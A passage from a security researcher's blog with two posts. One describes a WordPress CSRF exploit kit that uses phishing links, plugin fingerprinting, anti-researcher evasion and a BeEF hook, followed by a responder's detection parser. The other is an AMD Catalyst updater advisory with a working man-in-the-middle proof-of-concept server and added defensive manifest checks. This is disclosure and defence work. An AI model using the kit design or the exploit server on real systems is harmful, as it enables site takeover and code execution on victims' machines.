<p>Over the last few weeks I've been on a roll finding CSRF vulnerabilities in WordPress plugins. That's all nice and good, but when you've got 30 of them, it's a shame not to take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine and, most importantly, to hopefully inspire others to think along these lines. It is meant for educational purposes only, not for attacks against running services or people.</p>
<p><a href="https://github.com/CharlieEriksen/WP-CSRF-POC">https://github.com/CharlieEriksen/WP-CSRF-POC</a></p>
<p>The project shows a few basic concepts regarding the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out:</p>
<ul>
<li>It's not designed to simply spray and pray. You define the target URLs you want to hit, and you then get a unique URL for each blog that you can go phishing with.</li>
<li>On a request through that pre-defined unique URL, it uses the onload handler of an img or script tag to detect the presence of the vulnerable plugin on the target blog.</li>
<li>We generate the payload on request with a uniquely identifying URL, to ensure it's not easy to extract the exploits.</li>
<li>You get at most 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back, which makes life harder for researchers.</li>
<li>We deliver a <a href="http://beefproject.com/">BeEF hook</a>, because BeEF is cool and god damn tasty.</li>
</ul>
<p>I especially want to stress the “novel” use of the onload handler of img/script tags. People have used it in the past to detect the presence of different host-names and to “port scan” internal systems by vectoring through a hooked browser. That's cool and all, but you can take it further and use it to detect the presence of a plugin on a target on demand, which lets you be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script.</p>
<p>A normal series of events would be:</p>
<ol type="1">
<li>An attacker sets up this script with pre-defined targets (the targets variable), with a unique URL for each target blog</li>
<li>The attacker then spams out a link to the running script with the unique URL for each target blog</li>
<li>When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL</li>
<li>The script then generates a random URL for each exploit we have, with the target blog URL put in, which can then be requested</li>
<li>We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog</li>
<li>If none of the plugins are detected on the blog, we redirect to Google</li>
<li>If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4</li>
<li>The exploit is now written out to the user, submitting the CSRF with an XSS payload pointing to our BeEF instance</li>
<li>We now delete all cached exploits made for the requesting IP</li>
</ol>
<p>There are a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much dirtier and not the goal of this proof of concept. I urge anybody who finds the concept useful to run with it if they so desire. I'll be adding more exploits as advisories are published. Otherwise, I'm curious to hear people's thoughts on this.</p>
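<p>From a responder's side, the landing pages described in this post and in the conditional CSRF post above leave a recognisable artifact: zero-size image and script tags that load plugin assets from the victim blog and redirect on onload or onerror. The Python below, added here and not part of the WP-CSRF-POC project, parses such a captured page into the plugin slugs being probed and the redirect targets, and lists the asset paths to search for in the blog's access log. The sample page is constructed after the one shown in the conditional CSRF post, with one plain img/onerror variant added to show the parser handles both event forms.</p>

```python
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample modelled on the landing page in the conditional CSRF
# post: each tag loads a plugin asset from the victim blog and, if the asset
# exists (onload) or, in the third variant, is missing (onerror), redirects
# the browser to a per-plugin URL on the page's own host.
SAMPLE_LANDING_PAGE = """
<image src="http://192.168.1.116/wordpress/wp-content/plugins/all-in-one-webmaster/images/fail.jpg" width="0" height="0" onload="window.location = '/pi2Y4fcVY7fRHjo';">
<script src="http://192.168.1.116/wordpress/wp-content/plugins/easy-adsense-lite/wz_tooltip.js" onload="window.location = '/105BTlRREjf4E4F';"></script>
<img src="http://192.168.1.116/wordpress/wp-content/plugins/wp-print/images/print.gif" width="0" height="0" onerror="window.location = '/xQEMYQu2lOGPXAf';">
"""

PLUGIN_SLUG_RE = re.compile(r"/wp-content/plugins/([^/]+)/")
REDIRECT_RE = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


class ProbeExtractor(HTMLParser):
    """Collect img/image/script tags whose onload or onerror handler redirects."""

    PROBE_TAGS = {"img", "image", "script"}

    def __init__(self) -> None:
        super().__init__()
        self.probes: List[Dict[str, object]] = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.PROBE_TAGS:
            return
        a = dict(attrs)
        src = a.get("src") or ""
        parts = urlsplit(src)
        slug = PLUGIN_SLUG_RE.search(src)
        for event in ("onload", "onerror"):
            handler = a.get(event)
            if not handler:
                continue
            redirect = REDIRECT_RE.search(handler)
            if not redirect:
                continue  # a handler that does not navigate is not a probe
            self.probes.append({
                "tag": tag,
                "event": event,
                "host": parts.netloc,
                "asset_path": parts.path,
                "plugin": slug.group(1) if slug else None,
                "redirect": redirect.group(1),
                # zero-size images are loaded for the side effect only
                "hidden": a.get("width") == "0" and a.get("height") == "0",
            })


def extract_probes(html: str) -> List[Dict[str, object]]:
    """Parse a captured landing page into one record per plugin probe."""
    parser = ProbeExtractor()
    parser.feed(html)
    parser.close()
    return parser.probes


def probed_plugins(probes) -> List[str]:
    """Plugin slugs the page fingerprints, in document order, without repeats."""
    seen, out = set(), []
    for p in probes:
        slug = p["plugin"]
        if slug and slug not in seen:
            seen.add(slug)
            out.append(slug)
    return out


def log_indicators(probes) -> List[str]:
    """Asset paths to search for in the blog's access log.

    A request for one of these whose Referer is an off-site page, rather
    than the blog itself, is the probe firing in a visitor's browser.
    """
    return sorted({p["asset_path"] for p in probes})
```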
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/#comments" title="Comment on WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins">1 Comment</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-238 -->
<article id="post-228" class="post-228 post type-post status-publish format-standard hentry category-advisories tag-amd">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/" title="2:09 pm" rel="bookmark" class="entry-date"><time datetime="2013-03-17T14:09:23+00:00" pubdate>March 17, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/" title="Permalink to AMD Catalyst driver update vulnerability" rel="bookmark">AMD Catalyst driver update vulnerability</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p><strong>Description of vulnerability</strong></p>
<p>The AMD Catalyst driver auto update feature enables users to automatically update the AMD Catalyst driver on their machine through a single click when the driver determines that it is out of date.</p>
<p>However, a vulnerability exists in this mechanism because:</p>
<ol>
<li>The download URL is obtained, and the binary downloaded, over plain HTTP</li>
<li>The binary is not verified as having been signed by AMD before it is executed</li>
</ol>
<p>This means that a man-in-the-middle attacker can intercept the requests to the AMD support site and redirect the auto-update feature to download and execute a binary of the attacker's choice, without the user knowing any better when they decide to auto-update.</p>
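<p>An added example, not AMD's code, of the client-side checks that close the two gaps just listed, written in Python against the manifest format the proof of concept below reproduces: the download URL from TextSingle1 must be HTTPS to an allow-listed host, and the downloaded bytes must match a digest the manifest pins. The Sha256 element and the one-host allow-list are assumptions (the real manifest carries no digest, which is the second gap); on Windows the proper check is the installer's Authenticode signature, for which this offline example substitutes a pinned hash.</p>

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Hosts the updater may fetch installers from. www2.ati.com is the host in
# the manifest below; treating it as the only trusted one is an assumption.
TRUSTED_DOWNLOAD_HOSTS = {"www2.ati.com"}

# Constructed manifest in the shape of the one the proof of concept serves,
# trimmed to the fields this check uses. <Sha256> is an assumed addition
# (the real manifest has no digest); its value is the SHA-256 of the
# three-byte constructed sample installer b"abc" used in the checks.
MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<list>
<Catalyst-Driver-Files>
<Title>Catalyst Software Suite with .NET 4 Support</Title>
<RevisionNumber>12.42</RevisionNumber>
<TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
<Sha256>ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad</Sha256>
</Catalyst-Driver-Files>
</list>
"""


def entries_from_manifest(xml_text: str) -> List[dict]:
    """Pull the fields the updater acts on out of each Catalyst-Driver-Files entry."""
    root = ET.fromstring(xml_text)
    return [{
        "title": e.findtext("Title"),
        "revision": e.findtext("RevisionNumber"),
        "url": e.findtext("TextSingle1"),
        "sha256": e.findtext("Sha256"),
    } for e in root.findall("Catalyst-Driver-Files")]


def download_url_is_acceptable(url: Optional[str]) -> Tuple[bool, str]:
    """Refuse any download location a network attacker could have substituted.

    Plain HTTP (gap 1) lets a man-in-the-middle rewrite both the URL and the
    bytes; an unexpected host means the manifest itself was tampered with.
    """
    if not url:
        return False, "no download URL"
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, "scheme %r is not https" % parts.scheme
    if parts.hostname not in TRUSTED_DOWNLOAD_HOSTS:
        return False, "host %r not in allow-list" % parts.hostname
    if not parts.path.lower().endswith(".exe"):
        return False, "unexpected file type"
    return True, "ok"


def binary_matches_manifest(blob: bytes, expected_sha256: Optional[str]) -> bool:
    """Gap 2: never execute bytes whose digest is absent or does not match."""
    if not expected_sha256:
        return False
    actual = hashlib.sha256(blob).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


def vet_manifest(xml_text: str) -> List[Tuple[str, bool, str]]:
    """Run the URL check over every entry; returns (title, ok, reason).

    The manifest on the page fails here before any download happens,
    because its only download URL is plain http://.
    """
    return [(e["title"],) + download_url_is_acceptable(e["url"])
            for e in entries_from_manifest(xml_text)]
```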
<p><strong>Proof of concept</strong></p>
<div id="crayon-53c98e7809981845412747" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
# Python 2 proof of concept (SimpleHTTPServer/SocketServer became
# http.server/socketserver in Python 3). It stands in for the AMD support
# site that a man-in-the-middle has redirected the updater to.
import SimpleHTTPServer
import SocketServer

# Copy of the driver manifest the updater fetches over plain HTTP. The
# updater follows TextSingle1 and runs whatever comes back.
xml = """<?xml version="1.0" encoding="utf-8"?>
<list>
<Catalyst-Driver-Files>
<Title>Catalyst Software Suite with .NET 4 Support</Title>
<DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory>
<DriverLanguage>;#All;#</DriverLanguage>
<DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType>
<FileSize>184 MB</FileSize>
<OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
<ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate>
<RevisionNumber>12.42</RevisionNumber>
<RollupSortOrder>15</RollupSortOrder>
<TextMultiple1>
</TextMultiple1>
<TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
<TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype>
<ContentType>GraphicsDriverFile</ContentType>
<DriverVersionSupported>;#12.42;#</DriverVersionSupported>
<ID>956</ID>
<Modified>2012-10-22T21:30:52-05:00</Modified>
<Created>2012-10-22T21:30:52-05:00</Created>
<Author>System Account</Author>
<Editor>System Account</Editor>
<_UIVersionString>1.0</_UIVersionString>
<Attachments>0</Attachments>
<TitleCN>Catalyst Software Suite</TitleCN>
<TitleBR>Catalyst Software Suite</TitleBR>
<TitleDE>Catalyst Software Suite</TitleDE>
<TitleFR>Catalyst Software Suite</TitleFR>
<TitleIT>Catalyst Software Suite</TitleIT>
<TitleLA>Catalyst Software Suite</TitleLA>
<DescriptionCN>
</DescriptionCN>
<DescriptionBR>
</DescriptionBR>
<DescriptionDE>
</DescriptionDE>
<DescriptionFR>
</DescriptionFR>
<DescriptionIT>
</DescriptionIT>
<DescriptionLA>
</DescriptionLA>
<TitleKR>(Catalyst Software Suite)</TitleKR>
<DescriptionKR>
</DescriptionKR>
<LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu>
<LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle>
</Catalyst-Driver-Files>
</list>
"""


class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        if "catalystxml" in self.path:
            # Manifest request: return the XML above.
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            self.wfile.write(xml)
            return
        elif ".exe" in self.path:
            # Installer request: serve a harmless local executable (calc.exe)
            # in place of the real driver package. The updater runs it
            # without checking for an AMD signature.
            self.send_response(200)
            self.send_header('Content-type', 'application/octet-stream')
            self.end_headers()
            f = open(r"C:\Windows\System32\calc.exe", "rb")
            self.wfile.write(f.read())
            f.close()
            return


# Listen on port 80, the port the updater's plain-HTTP requests arrive on.
httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()</textarea></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tr class="crayon-row">
<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809981845412747-1"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">SimpleHTTPServer</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-2"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">SocketServer</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-3"> </div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-4"><span class="crayon-k ">xml</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-s">"""<span class="crayon-ta"><?</span><span class="crayon-e">xml </span><span class="crayon-i">version</span><span class="crayon-o">=</span><span class="crayon-s">"1.0"</span><span class="crayon-h"> </span><span class="crayon-i">encoding</span><span class="crayon-o">=</span><span class="crayon-s">"utf-8"</span><span class="crayon-ta">?></span></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-5"><span class="crayon-s"><list></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-6"><span class="crayon-s"> <Catalyst-Driver-Files></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-7"><span class="crayon-s"> <Title>Catalyst Software Suite with .NET 4 Support</Title></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-8"><span class="crayon-s"> <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-9"><span class="crayon-s"> <DriverLanguage>;#All;#</DriverLanguage></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-10"><span class="crayon-s"> 
<DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-11"><span class="crayon-s"> <FileSize>184 MB</FileSize></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-12"><span class="crayon-s"> <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-13"><span class="crayon-s"> <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-14"><span class="crayon-s"> <RevisionNumber>12.42</RevisionNumber></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-15"><span class="crayon-s"> <RollupSortOrder>15</RollupSortOrder></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-16"><span class="crayon-s"> <TextMultiple1></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-17"><span class="crayon-s"> </TextMultiple1></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-18"><span class="crayon-s"> <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-19"><span class="crayon-s"> <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-20"><span class="crayon-s"> <ContentType>GraphicsDriverFile</ContentType></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-21"><span class="crayon-s"> <DriverVersionSupported>;#12.42;#</DriverVersionSupported></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-22"><span class="crayon-s"> <ID>956</ID></span></div><div class="crayon-line" 
id="crayon-53c98e7809981845412747-23"><span class="crayon-s"> <Modified>2012-10-22T21:30:52-05:00</Modified></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-24"><span class="crayon-s"> <Created>2012-10-22T21:30:52-05:00</Created></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-25"><span class="crayon-s"> <Author>System Account</Author></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-26"><span class="crayon-s"> <Editor>System Account</Editor></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-27"><span class="crayon-s"> <_UIVersionString>1.0</_UIVersionString></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-28"><span class="crayon-s"> <Attachments>0</Attachments></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-29"><span class="crayon-s"> <TitleCN>Catalyst Software Suite</TitleCN></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-30"><span class="crayon-s"> <TitleBR>Catalyst Software Suite</TitleBR></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-31"><span class="crayon-s"> <TitleDE>Catalyst Software Suite</TitleDE></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-32"><span class="crayon-s"> <TitleFR>Catalyst Software Suite</TitleFR></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-33"><span class="crayon-s"> <TitleIT>Catalyst Software Suite</TitleIT></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-34"><span class="crayon-s"> <TitleLA>Catalyst Software Suite</TitleLA></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-35"><span class="crayon-s"> <DescriptionCN></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-36"><span class="crayon-s"> 
</DescriptionCN></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-37"><span class="crayon-s"> <DescriptionBR></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-38"><span class="crayon-s"> </DescriptionBR></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-39"><span class="crayon-s"> <DescriptionDE></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-40"><span class="crayon-s"> </DescriptionDE></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-41"><span class="crayon-s"> <DescriptionFR></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-42"><span class="crayon-s"> </DescriptionFR></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-43"><span class="crayon-s"> <DescriptionIT></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-44"><span class="crayon-s"> </DescriptionIT></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-45"><span class="crayon-s"> <DescriptionLA></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-46"><span class="crayon-s"> </DescriptionLA></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-47"><span class="crayon-s"> <TitleKR>(Catalyst Software Suite)</TitleKR></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-48"><span class="crayon-s"> <DescriptionKR></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-49"><span class="crayon-s"> </DescriptionKR></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-50"><span class="crayon-s"> <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-51"><span class="crayon-s"> <LinkTitle>Catalyst Software Suite 
with .NET 4 Support</LinkTitle></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-52"><span class="crayon-s"> </Catalyst-Driver-Files></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-53"><span class="crayon-s"></list></span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-54"><span class="crayon-s">"""</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-55"> </div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-56"><span class="crayon-t">class</span><span class="crayon-h"> </span><span class="crayon-e">ExploitHandler</span><span class="crayon-sy">(</span><span class="crayon-k ">SimpleHTTPServer</span><span class="crayon-sy">.</span><span class="crayon-i">SimpleHTTPRequestHandler</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-57"><span class="crayon-h"> </span><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-e">do_GET</span><span class="crayon-sy">(</span><span class="crayon-r">self</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-58"><span class="crayon-h"> </span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-s">"catalystxml"</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-i">path</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-59"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_response</span><span class="crayon-sy">(</span><span class="crayon-cn">200</span><span 
class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-60"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_header</span><span class="crayon-sy">(</span><span class="crayon-s">'Content-type'</span><span class="crayon-sy">,</span><span class="crayon-s">'text/xml'</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-61"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">end_headers</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-62"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-v">wfile</span><span class="crayon-sy">.</span><span class="crayon-e">write</span><span class="crayon-sy">(</span><span class="crayon-k ">xml</span><span class="crayon-sy">)</span><span class="crayon-h"> </span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-63"><span class="crayon-h"> </span><span class="crayon-st">return</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-64"><span class="crayon-h"> </span><span class="crayon-st">elif</span><span class="crayon-h"> </span><span class="crayon-s">".exe"</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-i">path</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-65"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_response</span><span class="crayon-sy">(</span><span class="crayon-cn">200</span><span 
class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-66"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_header</span><span class="crayon-sy">(</span><span class="crayon-s">'Content-type'</span><span class="crayon-sy">,</span><span class="crayon-s">'application/octet-stream'</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-67"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">end_headers</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-68"><span class="crayon-h"> </span><span class="crayon-v">f</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">open</span><span class="crayon-sy">(</span><span class="crayon-i">r</span><span class="crayon-s">"C:\Windows\System32\calc.exe"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"rb"</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-69"><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-v">wfile</span><span class="crayon-sy">.</span><span class="crayon-e">write</span><span class="crayon-sy">(</span><span class="crayon-v">f</span><span class="crayon-sy">.</span><span class="crayon-e">read</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-70"><span class="crayon-h"> </span><span class="crayon-v">f</span><span class="crayon-sy">.</span><span class="crayon-e">close</span><span class="crayon-sy">(</span><span 
class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-71"><span class="crayon-h"> </span><span class="crayon-st">return</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-72"> </div><div class="crayon-line" id="crayon-53c98e7809981845412747-73"><span class="crayon-v">httpd</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">SocketServer</span><span class="crayon-sy">.</span><span class="crayon-e">ThreadingTCPServer</span><span class="crayon-sy">(</span><span class="crayon-sy">(</span><span class="crayon-s">'0.0.0.0'</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">80</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">ExploitHandler</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-74"><span class="crayon-v">httpd</span><span class="crayon-sy">.</span><span class="crayon-e">serve_forever</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div></div></td>
</tr>
</table>
</div>
</div>
<p>By pointing <a href="http://amd.com/" target="_blank">amd.com</a>, <a href="http://www.amd.com/" target="_blank">www.amd.com</a>, <a href="http://www.ati.com/" target="_blank">www.ati.com</a> and <a href="http://www2.ati.com/" target="_blank">www2.ati.com</a> at this script, you’ll observe that the Catalyst update feature will prompt you to update the driver, and download and execute calc.exe.</p>
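<p>The updater described above trusts whatever XML the resolved host serves over plain HTTP and then runs the linked .exe. As an added example (not code from the advisory or from AMD), the checker below applies the client-side controls such a manifest needs before it is acted on: an https download URL, a pinned download host, the expected content type and a well-formed, newer version. Element names follow the manifest shown in the advisory; the allowed-host set and the installed version are assumptions for the demo.</p>

```python
"""Checks a client should apply to a Catalyst-style driver manifest.

Added example, not code from the advisory or from AMD. Element names
follow the manifest shown in the advisory; ALLOWED_HOSTS and the
installed version passed to check_entry() are assumptions.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Assumption: the only hosts the client may fetch driver binaries from.
ALLOWED_HOSTS = {"www2.ati.com", "www.amd.com"}
VERSION_RE = re.compile(r"^\d+(\.\d+)*$")

# Constructed sample, abbreviated from the manifest in the advisory.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<list>
  <Catalyst-Driver-Files>
    <Title>Catalyst Software Suite with .NET 4 Support</Title>
    <RevisionNumber>12.42</RevisionNumber>
    <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
    <ContentType>GraphicsDriverFile</ContentType>
    <ID>956</ID>
  </Catalyst-Driver-Files>
</list>
"""


def parse_entries(xml_text):
    """Return one dict of tag -> text per <Catalyst-Driver-Files> element."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [{child.tag: (child.text or "").strip() for child in node}
            for node in root.findall("Catalyst-Driver-Files")]


def version_tuple(text):
    """Turn '12.42' into (12, 42); raise ValueError on anything else."""
    if not VERSION_RE.match(text):
        raise ValueError("malformed version: %r" % text)
    return tuple(int(part) for part in text.split("."))


def check_entry(entry, installed_version):
    """Return the list of reasons this entry must not be acted on.

    An empty list means the offer passes every client-side check. The
    manifest carries no digest or signature for the binary, so after the
    download the client still has to verify the file's code signature;
    that step is outside this example.
    """
    findings = []
    parsed = urlparse(entry.get("TextSingle1", ""))
    if parsed.scheme != "https":
        findings.append("download URL is not https")
    if parsed.hostname not in ALLOWED_HOSTS:
        findings.append("download host %r is not pinned" % parsed.hostname)
    if entry.get("ContentType") != "GraphicsDriverFile":
        findings.append("unexpected ContentType %r" % entry.get("ContentType"))
    try:
        offered = version_tuple(entry.get("RevisionNumber", ""))
        if offered <= version_tuple(installed_version):
            findings.append("offered version is not newer than installed")
    except ValueError as exc:
        findings.append(str(exc))
    return findings


def acceptable_updates(xml_text, installed_version):
    """Entries from xml_text that pass check_entry(), in manifest order."""
    return [e for e in parse_entries(xml_text)
            if not check_entry(e, installed_version)]


if __name__ == "__main__":
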